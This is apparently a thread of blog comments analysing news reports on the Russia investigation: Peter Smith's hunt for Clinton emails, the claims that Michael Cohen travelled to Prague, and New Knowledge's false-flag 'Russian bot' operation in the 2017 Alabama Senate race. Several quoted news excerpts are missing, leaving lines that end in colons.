Nuland and Senator Collins also discussed another previously undisclosed alleged Russian government covert action during her Senate testimony: Collins brought up how FBI officials advised the Senate intelligence committee in the summer of 2016 that Russian diplomats were traveling around the country in areas they were not permitted to visit under diplomatic protocols. Collins was told at the time that this was apparently to collect intelligence. Nuland agreed. There’s no information on what kind of places these diplomats visited or what kind of intelligence they are suspected of collecting, but all parties involved have apparently concluded that this must have been a Kremlin covert action:
So now you know: Victoria Nuland, wife of Project for the New American Century co-founder Robert Kagan, was helping to develop the US response to the hacks along with a number of other State Department officials, and she learned about the hacks in December of 2015, months before the DNC itself belatedly learned about it.
Here’s an interesting followup on the mystery behind the operation set up by GOP financier Peter Smith to find and obtain Hillary Clinton’s hacked emails on the “dark web”. Recall how this operation appears to have involved a number of Trump campaign members — Michael Flynn, Steve Bannon, Kellyanne Conway, and Sam Clovis — according to the documents incorporating one of the companies set up for this operation. Also recall how they reached out to Alt Right troll Charles Johnson, who referred to other Alt Right operations with the same goal. Johnson reportedly advised Smith to contact Andrew ‘weev’ Auernheimer about finding the emails.
Such an operation presumably cost money to run, especially if the hacked emails are discovered and hackers are asking for money. So it’s interesting to learn that the FBI and congressional investigators were looking into a number of suspicious financial transactions done by Smith during this period. Specifically, it sounds like the investigators looked over the documents provided by Smith’s bank, Northern Trust, showing 88 suspicious cash withdrawals totaling about $140,000 between January 2016 and April 2017. The withdrawals were labeled “suspicious” when the purpose couldn’t be determined.
Keep in mind that Smith had significant enough health problems that he ended up committing suicide last May, so there were probably quite a few reasons for the guy to be withdrawing money once it was clear he was dying. But also recall that the suicide note he left indicated that his health became problematic in January of 2017. So all those unexplained cash withdrawals throughout 2016 can’t be easily explained away by Smith’s terminal illness.
Was all that $140,000 spent on this project to get Hillary’s emails? That’s unclear. Was some of the money used to pay hackers for information? Well, according to a person with direct knowledge of Smith’s project, Smith stated that he was prepared to pay hackers “many thousands of dollars” for Clinton’s emails — and ultimately did so. So while we don’t know how much of that $140,000 was spent on this email project and we don’t know what it was spent on, it sure sounds like Smith’s operation was spending thousands of dollars to pay someone for something:
“In one of the most intriguing episodes of the 2016 presidential campaign, Republican activist Peter W. Smith launched an independent effort to obtain Hillary Clinton’s emails to help defeat her and elect Donald Trump. His quest, which reportedly brought him into contact with at least two sets of hackers that he himself believed were Russian, remains a key focus of investigations into whether the Trump campaign colluded with the Kremlin.”
Well that’s kind of good to hear if true: Smith’s quest for Hillary’s emails remains a “key focus of investigations.” Given all the Trump-affiliated people involved it would have been rather obscene if this wasn’t a key focus, as is also the case given the suspicious timing of some of these financial transactions. Especially given that one of the people involved with the project is saying that Smith stated he was prepared to pay the hackers “many thousands of dollars” for Hillary’s emails, and ultimately did so:
One other source of possible expenses that Smith would have had to spend money on is setting up the company to actually carry out this work, KLS Research:
And it was money moved from KLS Research accounts to Smith’s personal accounts that appears to have caught investigators’ attention. Soon after Labor Day in 2016, Smith apparently had an operational plan for vetting and acquiring the emails he claimed were offered to him over the Dark Web by people he believed to be Russians. That included a little more than $4,900 sent to an LLC controlled by a private real estate company. So it would be interesting to learn the name of that company:
And when Smith’s bank was subpoenaed, investigators learned about 88 suspicious transactions, worth about $140,000, that Smith’s bank couldn’t find a reason for from January 1, 2016 to April 2017:
And this is all why Smith is apparently still an important figure for investigators. We have all the elements of the crime — claims of contact with hackers that allegedly had Hillary’s emails, shady financial transactions, and contacts with the Trump campaign — so it would be pretty amazing if he wasn’t seen as an important figure:
Unfortunately, Smith committed suicide and won’t be answering any more questions. But it sounds like Mueller’s team did interview other people involved with Smith’s operation, with an eye on determining whether or not Michael Flynn was involved:
Considering that Flynn has been a cooperating witness for the Mueller investigation, it’s going to be interesting to see what happens if evidence that Flynn worked directly on this operation comes out while Flynn denies any involvement.
Anyway, that all appears to indicate that Peter Smith’s operation is still very much a topic of interest to investigators and those investigators have a number of financial transactions to assist in that investigation.
Of course, it would be absurd if investigators weren’t still looking into this. Along those lines, we still have no indication that the other GOP operation to obtain Hillary Clinton’s hacked emails on the dark web — the operation involving Barbara Ledeen, Newt Gingrich, and Judicial Watch — is also still being looked into by investigators.
There’s no shortage of speculation about the legal threat Michael Cohen presents to President Trump following his recent decision to ‘flip’ and offer to assist the Mueller investigation. And it’s well founded speculation. Cohen was apparently deeply involved with everything from the Trump Tower Moscow initiative led by Felix Sater to the Ukrainian ‘peace plan’ proposal (also led by Felix Sater).
Then there’s Cohen’s familial connections. Like how his Ukrainian wife is the daughter of some mob connected Ukrainians. Cohen’s uncle owned a club that was patronized by leading Russian and Ukrainian mafia figures from the 70’s — 90’s. Cohen’s father-in-law, Felix Shusterman, is a Ukrainian immigrant to the US who was involved with the mafia and the Trump organization (Trump’s hiring of Cohen was seen as a favor to Shusterman). And Cohen’s brother’s father-in-law was Alexander Oronov, the recently deceased Ukrainian oligarch with a number of connections to Ukrainian figures including Andrii Artemenko. Cohen clearly knows A LOT that could be of interest to anyone investigating #TrumpRussia.
And as the following article notes, there’s one key area of the #TrumpRussia investigation that Cohen allegedly was intimately involved with according to the Steele Dossier that would put Cohen at the center of the alleged conspiracy between the Trump campaign and the Kremlin to collude over the hacks of the Democrats: The dossier alleged that Cohen took over the role of negotiating with the Kremlin after Paul Manafort left the Trump campaign in August of 2016, and that Cohen traveled to Prague in August or September of 2016 and met with Kremlin representatives where they hashed out a deal to pay off the ‘Romanian hackers’ for the hacks.
The article notes that there was a report back in April that the Mueller team had uncovered evidence of such a visit, but the article also notes that there’s been no follow-up reporting indicating whether or not this report was true.
So the question of whether or not Michael Cohen was in Prague in 2016 remains an open question. And as the following article points out, Cohen’s attorney Lanny Davis recently explicitly denied that Cohen has ever traveled to Prague. So while Cohen appears to have had a significant change of heart in terms of his willingness to work with investigators, the question of whether or not Cohen will end up validating or contradicting the Steele dossier allegations about him appears to be at least somewhat answered: he’s going to contradict the dossier’s claims. At least some of them.
It’s also worth noting that, if the dossier’s claims about a meeting in Prague to work out the payment to the hackers is true, that would be one example of how this has to be one of the stupidest intelligence operations in history. Think about it: the Kremlin and the Trump team are engaged in a high stakes secret negotiation involving the high profile hacking of the Democrats, and for some reason they decided that these Russian government hackers needed to be paid off by the Trump team in order to execute this extremely risky operation. Really?! Why?! Why couldn’t the Russian hacker team get paid off by the Kremlin like they are presumably already being paid if they are Russian government hackers?
Also recall how Mueller’s recent indictment of 12 GRU officers over the hacks specifically detailed how these officers planned and executed the phishing campaigns and deployment of the malware (albeit, with scant claims of evidence to back up those detailed allegations). There were no third-party cut-out hackers referenced in the indictment. So if the Steele dossier’s claims about Cohen going to Prague to negotiate a payout to the hackers is true, and those hackers were actually GRU agents, that would defy logic unless the Kremlin was actually trying to goad the Trump team into creating an evidentiary trail to be followed later. Which would be an odd thing to do if they were colluding with the Trump team in order to see a change in US policy towards Russia.
So it’s going to be interesting to see what, if any, hacking related revelations emerge from Michael Cohen ‘flipping’. But given that even the Mueller indictment itself contradicts the Steele dossier, we probably shouldn’t expect the newly cooperative Cohen to confirm many of that dossier’s allegations:
“In the hours after Donald Trump’s former attorney Michael Cohen pleaded guilty to various crimes on Tuesday, his attorney Lanny Davis appeared on a number of television shows and granted other interviews centered on a common theme: Cohen has information that could be of interest to special counsel Robert S. Mueller III.”
It was quite a tease: Lanny Davis goes on TV promising that Michael Cohen has information that could be of interest to Robert Mueller. Because of course he would. He’s Michael Cohen.
One of the areas that Cohen could provide some devastating testimony against Trump is whether or not Trump personally knew about the notorious June 9th, 2016, meeting involving the Russian delegation offering ‘dirt’ on Hillary Clinton. And he allegedly does indeed have information about whether or not Trump knew in advance:
Keep in mind that the question of whether or not Trump knew in advance of this meeting was more or less answered by Trump himself two days before the meeting. Recall how Trump gave a speech on June 7th, 2016, where he talked about how all sorts of new dirt on Hillary Clinton would be coming out soon. This was just two days before the June 9th meeting, and the original emails to Donald Trump, Jr. that set up the meeting explicitly said the Russian government wanted to hand over dirt on Hillary Clinton. So the circumstantial evidence that Trump at least thought this meeting was going to involve the Russian government handing over dirt on Hillary is pretty overwhelming. The big question is what actually transpired at that meeting and whether or not it involved the hacks.
And then there’s the allegations from the Steele dossier. Allegations that Michael Cohen traveled to Prague in order to have a secret meeting with Kremlin representatives where they discussed having the Trump team pay off the “Romanian hackers”:
It’s also worth asking why this discussion of how to pay off the hackers (as absurd as that is) didn’t come up during the June 9th meeting if that meeting was indeed about the hacked documents. We can add farcical levels of inefficiency to the many farcical aspects of this alleged Kremlin intelligence operation.
And yet there was indeed a report from back in April saying that the Mueller team did indeed have evidence of Cohen making a trip to Prague. The only problem is there’s been no followup on that report and Lanny Davis flatly denied it:
So if Cohen does end up becoming a significant witness in this investigation, while continuing to contradict key claims about him in the Steele dossier, it’s going to be interesting to see how that affects how the rest of the claims in that dossier are interpreted.
It’s also going to be interesting to see how the inevitable future movies portraying the alleged events of the #TrumpRussia conspiracy depict this alleged intelligence operation given all the farcical aspects of it. Will it be portrayed as a farcical spy comedy or a serious spy movie that happens to include one massive intelligence mistake after another? We’ll see, but the spy farce script sort of writes itself at this point.
Well that’s interesting: the US Senate Intelligence Committee recently released a report on its assessment of the role social media operations allegedly directed by the Kremlin played in the 2016 election. The report was written by a small cyber security firm, New Knowledge. New Knowledge’s co-founder, Ryan Fox, previously worked at the NSA and its other co-founder, Jonathon Morgan, previously served as a Special Advisor to the State Department.
And now, just a few days after the release of this report, we learn about a different report involving New Knowledge. That’s the report of a secret effort to ‘study’ the impact of Russian social media bots during the 2017 Senate special election in Alabama that saw Democrat Doug Jones eke out a victory over Roy Moore after the wave of revelations about Moore’s history of dating young teenage girls as an adult. The ‘study’ allegedly focused on understanding how the tactics used by Russian social media manipulation campaigns operated.
But what we’re learning is that the New Knowledge group may have actually created a large number of fake Russian bot accounts and had them follow Roy Moore for the purpose of creating a ‘Russian bots are helping Moore’ meme to energize Democrats and depress Republicans. According to the report, “We orchestrated an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” In addition, the report takes credit for “radicalizing Democrats with a Russian bot scandal”. And it was indeed the case that Roy Moore’s campaign suddenly experienced a big spike in Twitter accounts seemingly originating from Russia. Moore’s campaign blamed it on a dirty trick by Jones at the time.
And while the report doesn’t admit to creating those ‘Russian bot’ twitter accounts, there is evidence that the project had the capacity to direct thousands of fake twitter accounts. The evidence comes from another aspect of this project: the project created a fake Facebook page that posed as conservative Alabamians and used that page to endorse a third-party conservative candidate. The particular candidate the fake group endorsed was Mac Watson. Watson apparently contacted the fake Facebook group and the group responded by saying it would be inclined to support Watson and agreed to “boost” his candidacy and was “treated as an advisor and the go-to media contact for the write-in candidate.” The project claims it was what got interviews in The Montgomery Advertiser and the Washington Post for Watson’s campaign, so it sounds like it really was working to help the Watson campaign.
Here’s the part that makes it appear that this group was creating fake ‘Russian bot’ accounts: shortly after Watson agreed to work with this fake Facebook group, Watson’s twitter followers jumped from about 100 to about 10,000. So it would appear that this group was in control of thousands of fake twitter accounts.
The project appears to have been financed by Reid Hoffman, the billionaire co-founder of LinkedIn who tends to support Democrats. Hoffman was part of the “PayPal Mafia” of wealthy tech investors who were initially involved with PayPal (the company that earned figures like Elon Musk and Peter Thiel their initial wealth). The overall budget for the project was around $100,000. It’s worth noting that, while Hoffman supports the Democrats, he’s the type of billionaire supporter of the Democrats with a track record of scoffing at things like the New Deal and government regulation.
There’s no indication so far that Jones’s campaign was involved in this, and Jones is now calling for an investigation into what New Knowledge was up to.
So, to summarize, the cybersecurity firm that wrote the Senate Intelligence Committee’s recent report on the role Kremlin disinformation operations played in the 2016 election appears to have waged a disinformation operation of its own pretending to be a Kremlin operation. And that disinformation campaign may have involved the creation of thousands of fake ‘Russian bots’:
“An internal report on the Alabama effort, obtained by The New York Times, says explicitly that it “experimented with many of the tactics now understood to have influenced the 2016 elections.””
So the New York Times gets its hands on an internal report by ‘the Alabama project’, and we learn that it involved Jonathon Morgan, the CEO of New Knowledge, the same company that just wrote the Senate Intelligence Committee’s report on Russian social media meddling. And Morgan reached out to Renée DiResta, who would later join New Knowledge and who was the lead author on the Senate report:
And in this project report, they explicitly brag about orchestrating “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” And yet Morgan is acting like he has no recollection of this and assures us that “The research project was intended to help us understand how these kind of campaigns operated.” So it appears that the spin for this false-flag Russian operation is to portray it as a research effort to understand how Russian operations work:
But it doesn’t look like the project was limited to “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” They also set up a fake Facebook group of Alabama conservatives and tried to use it to promote a third-party conservative candidate. And when they found a candidate to back, Mac Watson, that candidate suddenly saw his twitter following jump from 100 to 10,000 followers. So the Alabama project was clearly working with thousands of fake Twitter accounts:
The report doesn’t indicate that the project was actually behind the alleged Russian bot accounts that suddenly started following Roy Moore. And we do know that the story of Russian bots following Moore was indeed a news story at the time. But it’s hard to think of any other meaning behind the report’s boasting of executing “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet” than to interpret that as an admission that those ‘Russian bot’ accounts were actually under the control of New Knowledge:
Importantly, it also appears that this operation was being run independently of the Jones campaign and the Democratic party. Instead, it was financed by Silicon Valley billionaire Reid Hoffman:
It’s also worth noting that, despite spending $100,000 on the project, their chosen third party candidate only got a few hundred votes. So it doesn’t look like their fake Russian bot activity was very successful:
Also recall that $100,000 was the presumed budget of the Internet Research Agency for purchasing Facebook ads in 2016.
So it would appear there’s much more to learn about what exactly New Knowledge was up to with its Alabama Project disinformation campaign. After all, if it turns out the Russian bots that suddenly started following Roy Moore were actually under the control of New Knowledge, that would raise the obvious question of how many other reports of Russian bot activity are actually the work of some other group. Not that we didn’t already know that spoofing ‘Russian bots’ is a trivial exercise, but confirmation that such activity is taking place would still be new.
It would also appear that the Senate Intelligence Committee’s report on Russian disinformation operations in 2016 could probably use a disinformation audit of its own.
@Pterrafractyl–
Brilliant analysis, and couched very intelligently.
The whole Russian/bot/twitter/Facebook/Instagram supposed IRA effort is suspect.
Beyond that–I am going into depth on the subject of “Destiny Betrayed” to give people a real hands-on feel for the depth of lying that the Powers That Be routinely manifest.
Keep up the great work!
Dave Emory
Was Michael Cohen really in Prague in 2016 for a clandestine meeting with Kremlin operatives, as was alleged in the Steele dossier? That’s the assertion of a recent McClatchy report. Specifically, there are four separate anonymous sources telling McClatchy that Mueller’s probe does indeed have evidence that Michael Cohen was in Prague in August or September of 2016. All four sources independently claim that evidence exists that Cohen’s cellphone ‘pinged’ a cell tower in the Prague area during that time.
In addition, two of the sources claim that an unnamed Eastern European intelligence agency eavesdropped on Russian officials talking to each other, where one Russian official informed the other that Cohen was in Prague.
It’s a pretty explosive report. And if it turns out it’s an accurate report it would go a long way towards establishing the veracity of the Steele dossier, especially since the claims about Cohen’s alleged trip to Prague were among the first to be disputed.
But as we’re going to see, this story and its explosive claims are already being met with skepticism. And as we’re also going to see, the sources for this report appear to have been trusted sources that these reporters have been relying on for a lot of other #TrumpRussia reports. Plus, it doesn’t appear that the journalists for this report have firsthand knowledge of the evidence. Instead, they’ve talked to people who claim to have knowledge of the evidence. And there’s no information about when this cell phone tower ping event or the eavesdropped conversations took place. Although we are told that the cell phone evidence was only discovered “sometime after Cohen apparently made his way to the Czech Republic”.
If the allegations are true it’s explosive for obvious reasons. But if it turns out that this is another instance where “anonymous sources” with intelligence connections are feeding what appears to be BS stories to the press — like the story of Paul Manafort making secret trips to the London embassy to visit with Julian Assange — that’s pretty explosive too because it raises the question of what other stories have relied on these same sources. So it’s a pretty explosive story whether or not it’s true:
“A mobile phone traced to President Donald Trump’s former lawyer and “fixer” Michael Cohen briefly sent signals ricocheting off cell towers in the Prague area in late summer 2016, at the height of the presidential campaign, leaving an electronic record to support claims that Cohen met secretly there with Russian officials, four people with knowledge of the matter say.”
So this report is based on four anonymous sources “with knowledge of the matter”. And each of those four sources “obtained their information independently from foreign intelligence connections”:
And while we are given no information about which foreign intelligence agencies informed these sources about these allegations, we are told from two sources that the eavesdropping that picked up the conversations between Russian officials that mentioned Cohen being in Prague was Eastern European:
Might this be a Ukrainian intelligence agency that claims to have this eavesdropped conversation? That seems like a pretty big question that needs answering.
So all four of these anonymous sources back up the claim about the cell phone tower pinging, and two of them back up the claim about the eavesdropped Russian conversation which comes from an Eastern European intelligence agency. Might this Eastern European intelligence agency be the same source for the claims about the cell phone tower pinging? Might that also be Ukraine?
The cell phone evidence was only discovered after the fact, so it was presumably somehow stored in the logs of either the phone carrier Cohen used or the cell phone manufacturer. And as the article notes, that kind of information is exactly the kind of information the Mueller probe would have likely already requested a long time ago. So if it turns out that this cell phone data is the kind of thing that Mueller’s team could have theoretically obtained, the fact that we’re only hearing about these allegations at this late point raises more questions about the accuracy of these allegations:
Then there’s a question of why there are no flight records for Cohen during that period. McClatchy had another report back in April of 2018, also based on anonymous sources, claiming that Mueller’s team already had evidence that Cohen specifically traveled from Germany to Prague during this time. As the article notes, US and European authorities should have a record if Cohen flew to Europe during this time. And yet flight records indicating Cohen flew into Germany during this time have yet to emerge and the sources for this report can’t give a set of specific dates when Cohen was supposedly in Prague:
So significant gaps remain in the evidence we are told investigators have.
Then there’s the fact that if Cohen did in fact make this trip, it would have been remarkably sloppy tradecraft to take your personal phone to a secret meeting. After all, based on what we are told, Cohen only very briefly had his phone on in Prague, suggesting an awareness that he needed to avoid having his phone tracked. Simply carrying that phone with its battery installed could have allowed him to be tracked whether the phone is turned on or not. And yet the cell phone tower data was limited to a single short ping. So did Cohen have something so urgent on his phone that he decided to put the battery in his phone and do something with it while in Prague during his super secret meeting with the Russians?
And we can’t ignore the fact that the Steele dossier alleges that a purpose of this secret meeting was so Cohen and the Kremlin could plot ways to limit discovery of the close “liaison” between the Trump campaign and Russia. Of course, having a secret meeting in Prague involving Michael Cohen, Trump’s long-time ‘fixer’, and a series of Kremlin representatives is quite possibly one of the worst ways one could imagine to limit the discovery of that liaison. After all, the hacks of the Democrats were already very public and openly blamed on Russia by August/September of 2016. So the idea that Michael Cohen could make a secret trip to Prague to meet with Russians at that point and not be spotted by anyone would have been a wild risk for both the Trump team and the Kremlin to take even if Cohen didn’t take his personal phone with him and turn it on while he was there:
Similarly, the Steele dossier also alleges that Konstantin Kosachev, a longtime member of the Russian Senate and chairman of the Federation Council’s Foreign Affairs Committee, “facilitated” the meeting in Prague and may even have been at the meeting. But as Mike Carpenter, a former Russia specialist at the Pentagon under President Barack Obama, puts it, the idea that someone as prominent as Kosachev would meet with Cohen for such a meeting seems unlikely – about “as discreet as sending (Secretary of State) Mike Pompeo to meet with an informant on a sensitive issue.”:
Then there’s the other absurd alleged goal of the meeting: ensuring that the European hackers who did the actual hack got paid and were told to “lie low” (because covertly paying off its hackers is apparently something the Kremlin wouldn’t already know how to do):
Just think about that idea: The Kremlin allegedly directed this team of hackers to hack the Democrats. But the Kremlin was also very concerned about getting caught and getting all sorts of negative news related to the hack. But despite all of these concerns and the highly sensitive nature of this operation, the question of how these hackers would be paid was something that came up in this secret meeting with Michael Cohen according to this scenario. That seems like incredibly sloppy tradecraft.
And then there’s the fact that Mueller already indicted the GRU for the hackings and that indictment charges those GRU officers with the full spectrum of the hack, from the spearphishing operation, to the development and distribution of the malware, to the creation of the fake online personas and websites like dcleaks.com. So the idea that ‘European hackers’ carried out this hack and needed to be paid off and told to ‘lie low’ is something that doesn’t appear to align with Mueller’s own indictment:
So that’s the new allegation about Michael Cohen in Prague. Allegations of a brief cell phone tower ping based on four anonymous sources and an eavesdropped Russian conversation based on two of those sources. And if these allegations are true, it would appear to corroborate the Steele dossier’s remarkable claims that Cohen met with multiple Russians in Prague to discuss things like how to avoid having this secret liaison discovered and how to pay off the hackers.
But as the following article describes, when pressed about the nature of this sourcing, the reporters admit that they never saw the primary evidence that these allegations were based on. Instead, it’s based on the word of these four sources. And as part of the justification for why we should trust these sources, the reporters point out that they’ve used them many times in the past. And that means that if there’s a problem with the source for this report, it’s a problem with the source for past reports too:
“McClatchy’s Greg Gordon, one of the journalists behind the explosive report on the president’s ex-lawyer Michael Cohen visiting Prague amid the 2016 election, admitted that he did not see first-hand some of the primary evidence used in the piece.”
Yep, this entire Cohen report is entirely based on the credibility of these four anonymous sources. But we are assured these are indeed credible sources because these reporters used these same sources for many different subjects. We’re also told they’ve been very accurate sources. But we aren’t told what those previously accurate stories based on these sources have been, so it’s still a matter of taking the word of these reporters that the word of their sources should be trusted:
Recall that one of the odd aspects of this most recent report is how there’s no information about specific dates. Like the date of the cell phone tower ping, the dates of the clandestine meeting, or the date of the eavesdropped conversation. So the fact that these four sources not only couldn’t provide physical evidence of their claims but couldn’t even provide dates suggests that the sources probably haven’t seen any physical documents either. In other words, it’s quite possible that this story is pretty much hearsay. Assuming it’s not pure disinformation.
And since this story is being used to buttress the claims that this Prague meeting actually took place, and Cohen and the Russians really did have a secret meeting where they discussed how to keep the Trump/Kremlin collusion a secret and minimize the blowback and also discussed how to pay off the hackers, it’s worth noting that the Steele dossier actually alleged that at least some of the hackers were at the meeting. That fun fact was tucked away in the April 2018 report by the same McClatchy reporters as the above report. This was the report where they first claimed that investigators had indeed come across evidence that Cohen visited Prague, arriving there from Germany. This report was also attributed to anonymous sources, which raises the question of whether or not it’s the same sources as in the above recent report. So literally inviting hackers to the secret meeting with Cohen and the Russians was apparently on the agenda at the meeting where they were trying to avoid exposure of the Trump/Kremlin collusion and blowback. It’s not the most impressive tradecraft:
“But investigators have traced evidence that Cohen entered the Czech Republic through Germany, apparently during August or early September of 2016 as the ex-spy reported, said the sources, who spoke on condition of anonymity because the investigation is confidential. He wouldn’t have needed a passport for such a trip, because both countries are in the so-called Schengen Area in which 26 nations operate with open borders. The disclosure still left a puzzle: The sources did not say whether Cohen took a commercial flight or private jet to Europe, and gave no explanation as to why no record of such a trip has surfaced.”
So, back in April of 2018, this same team of McClatchy reporters wrote an article based on anonymous sources that investigators had indeed determined that Cohen really did go to Prague through Germany. Might these anonymous sources be the same anonymous sources behind the recent Cohen revelation? It sure seems likely. But note that these sources appear to be given updates on the inner workings of the Mueller investigation (assuming “investigators” refers to Mueller’s team), so that gives us an idea of whether or not these anonymous sources are US-based or not.
And as the article noted at the time, the Steele dossier doesn’t just allege that Cohen met with Russians in Prague. There were several Eastern European hackers there, including Romanians. Recall how the persona of ‘Guccifer 2.0’ was initially supposed to be a lone Romanian hacker but that persona didn’t speak like a native Romanian speaker, using perfect English at times. Also recall that Mueller’s indictment of the GRU for the hack included charges that a GRU team was behind the creation and execution of the Guccifer 2.0 persona. So if the Kremlin was super concerned about getting caught being behind these hacks, as the Steele dossier alleges, the fact that GRU was apparently unable to impersonate a native Romanian speaker is another example of remarkably shoddy tradecraft, especially if there was literally a Romanian hacker working on this operation. After all, it’s not like this alleged Romanian hacker needed to be kept out of the loop about this being a Kremlin operation colluding with Trump since the hacker was apparently at the Prague meeting:
And then the article reminds us that the Steele dossier actually alleges that Russian diplomat Mikhail Kalugin played a role in coordinating the cyber offensive. Note that Kalugin’s name doesn’t appear in Mueller’s indictment of the GRU. So that would be another area where the Mueller GRU indictment doesn’t appear to be aligning with the accusations in the Steele dossier:
Finally, let’s take a quick look at that February 2017 McClatchy report about the allegations against Kalugin and the role he played in the alleged Kremlin cyber operation. As we’re going to see, two of the reporters for the article are the same two reporters for the above two McClatchy articles, Peter Stone and Greg Gordon. The report also relies entirely on anonymous sources. Might these be the very same anonymous sources for the above reports? Don’t forget what Greg Gordon told us in the second article: that these anonymous sources have been the sources for many previous reports. Does that include the following report?
The article also notes that the Steele dossier charges Kalugin with coordinating the payoff of the hackers. According to a Steele report on September 16, 2016, tens of thousands of dollars were being sent to the hackers and other operatives using the Russian pension system for Russians living in the US. So that would suggest the hackers, at least some of them, were Russians living in America.
Also recall that the reporters defended their sources by arguing that they’ve been accurate in the past. And in this case it’s very possible these anonymous sources were accurate since they simply allege that investigators were looking into whatever role Kalugin may have possibly played in the hack. Also note that, again, if it turns out these are the same anonymous sources that McClatchy used in the recent report on Michael Cohen and Prague, it would suggest that these anonymous sources are indeed quite close to the Mueller investigation or at least aware of its inner workings:
“Two people with knowledge of a multi-agency investigation into the Kremlin’s meddling have told McClatchy that Mikhail Kalugin was under scrutiny when he departed. He has been an important figure in the inquiry into how Russia bankrolled the email hacking of top Democrats and took other measures to defeat Hillary Clinton and help Donald Trump capture the White House, said the sources, who spoke on the condition of anonymity because of the sensitivity of the investigation.”
In February of 2017, a team of McClatchy reporters, including Peter Stone and Greg Gordon, had two anonymous sources who revealed that the Mueller team was looking into the role Mikhail Kalugin may have played in paying off the hackers. And as we saw above, in April of 2018, Stone and Gordon had another report citing anonymous sources assuring us that Mueller has seen evidence that Cohen traveled to Prague from Germany, seemingly backing up the Steele dossier. And then, just days ago, we get a new report by Stone and Gordon about how there’s been cell phone tower evidence and eavesdropped conversations further backing up the Prague meeting, also based on anonymous sources. And we are told by Gordon that the anonymous sources for this most recent report have been used for multiple stories in the past.
So while we don’t know if the anonymous sources for this February 2017 report are the same ones used in the April 2018 and December 2018 reports about the Prague trip, it sure seems like a good bet. And if that’s the case, it would appear that these anonymous sources have an interest in getting stories published that appear to back up the various allegations made in the Steele dossier that would back up the idea that the Kremlin was directly coordinating with the Trump campaign over the hackings. Allegations that include the allegation that Kalugin was moving tens of thousands of dollars to the hackers using the Russian government system for paying the pensions of Russian military veterans living in the US:
And note that this Steele report is from September 14, 2016, which is presumably shortly after when the Prague meeting allegedly took place in late August/early September 2016. If this report by Steele was accurate that would suggest Steele’s contacts in the Kremlin were very up to date on the workings of this cyber operation at the time.
So we have anonymous sources who are basically trying to convince the American public that the Steele dossier sourcing is correct regarding the Prague meeting and the various Kremlin efforts to coordinate the cyber operation. They haven’t actually shown the McClatchy reporters evidence of this, but we are supposed to take them at their word. And if that’s the case, we are supposed to believe that Michael Cohen secretly traveled to Prague in the middle of the 2016 campaign to secretly meet with some Kremlin representatives and some of the non-Russian hackers where they could all coordinate on how to minimize the chances of getting caught and also coordinate how to pay off the hackers without getting caught. And one of the methods for paying off the hackers involved a Russian diplomat working in DC using the Russian pension system for Russian military veterans living in the US. Also, Michael Cohen brought his personal cell phone to this secret Prague meeting and somehow made a highly ill-advised ping of a cell phone tower, and Russian officials were discussing this meeting on a phone that was wiretapped. It’s all a reminder that, if it turns out that the Steele dossier really is largely true and there was actually a massive Kremlin cyber operation that the Kremlin didn’t want to be discovered, this whole thing has got to be some sort of world record of shoddy tradecraft.
And if it, instead, turns out that these anonymous sources are running a disinformation campaign, that also points towards some problematic tradecraft.
The Washington Post got its hands on a document giving new details on the false flag ‘Russian bot’ operation that was being run in the 2017 Alabama special Senate race. That’s the psyop that was being run by New Knowledge, the cybersecurity firm that recently, and ironically, co-authored the Senate Intelligence Committee’s report on Russian disinformation operations. We now have an internal name for that psyop: Project Birmingham.
The new document appears to be a general summary of the results of Project Birmingham. It sounds like Project Birmingham was funded with $750,000 from Reid Hoffman and run by American Engagement Technologies (AET), a technology start-up founded by Mikey Dickerson, a former Obama administration official. Dickerson’s claim to fame includes fixing the buggy Obamacare website that led to the public relations nightmare for the Affordable Care Act. So while Dickerson may have helped fix a public relations nightmare in that case, he appears to have led the creation of a new public relations nightmare with Project Birmingham.
Hoffman’s relationship with AET was reportedly brokered by his political adviser, Dmitri Mehlorn. Mehlorn heads a group called Investing in US that helps direct Silicon Valley money into left-leaning political causes. So this whole thing appears to be primarily a creation of Silicon Valley millionaires and billionaires.
Both Dickerson and Hoffman claim to have had no knowledge of these kinds of ‘Russian bot’ false flag tactics at the time. Dickerson is also disassociating himself from the internal report, suggesting that it was created by New Knowledge. New Knowledge’s Jonathon Morgan, on the other hand, claims his firm had nothing to do with the document and downplays the scale of the New Knowledge project as merely a small experiment. Importantly, Morgan goes on to speculate that the Project Birmingham document was actually a summary of New Knowledge’s work and the work of other similar projects run by other groups under the Project Birmingham umbrella.
And based on the money involved, it does appear to be the case that more projects were going on, because only $100,000 was reportedly spent on New Knowledge’s work but $750,000 went to the entire project. So it sounds like there are a bunch of other similar operations managed by AET yet to be discovered:
“As the scandal has expanded, with calls for federal and state investigations and Facebook also conducting a review, the tactics described in the Project Birmingham document have come under intense scrutiny. Those included a “false flag” effort that generated phony evidence that automated Russian accounts called bots had supported Moore on Twitter and the creation of a misleading Facebook page, aimed at Alabama conservatives, that sought to undermine Moore by encouraging them to vote for a rival Republican through a write-in campaign.”
So at least some of the documents behind this false flag effort are available to journalists. In this case, the 12 page document is from three days after the December 15, 2017, Alabama vote and was presented to a group of 13 technology experts last September. And while New Knowledge’s name was redacted out of the document, Dickerson did eventually admit to reporters that the redacted name of the company behind the report was indeed New Knowledge:
And note how some of the fake Russian bot Twitter accounts had things like Cyrillic in the profile information, leading some reporters to question whether or not they were actually Russian at the time. Keep in mind that New Knowledge helped write the Senate Intelligence Committee’s report on Russian disinformation. So if the fake accounts that New Knowledge was trying to pass off as Russian included blatant ‘clues’ like Cyrillic, that gives us an idea of the kind of standards New Knowledge was likely using for identifying true ‘Russian bot’ accounts for the Senate report:
Not surprisingly, everyone involved with this report is denying awareness of Project Birmingham when it was happening. Hoffman gave $750,000 to Mikey Dickerson’s American Engagement Technologies (AET). Dickerson claims it came from New Knowledge and that he had only learned about the false flag tactics in early 2018:
Hoffman, who was funneling his money into AET through his political adviser, Dmitri Mehlorn’s Investing in US, is also claiming to have had no knowledge of this operation (that he paid $750,000 for). Mehlorn also claims ignorance of the key details of the project:
Renee DiResta, who went to work for New Knowledge and who was the lead author of the Senate Intelligence Committee report on Russian disinformation, is claiming that she knew nothing of the tactics New Knowledge was using:
And New Knowledge’s Jonathon Morgan publicly denied writing the Project Birmingham report and speculated that Project Birmingham is actually the name from an umbrella project that included New Knowledge’s work but also the work of other groups:
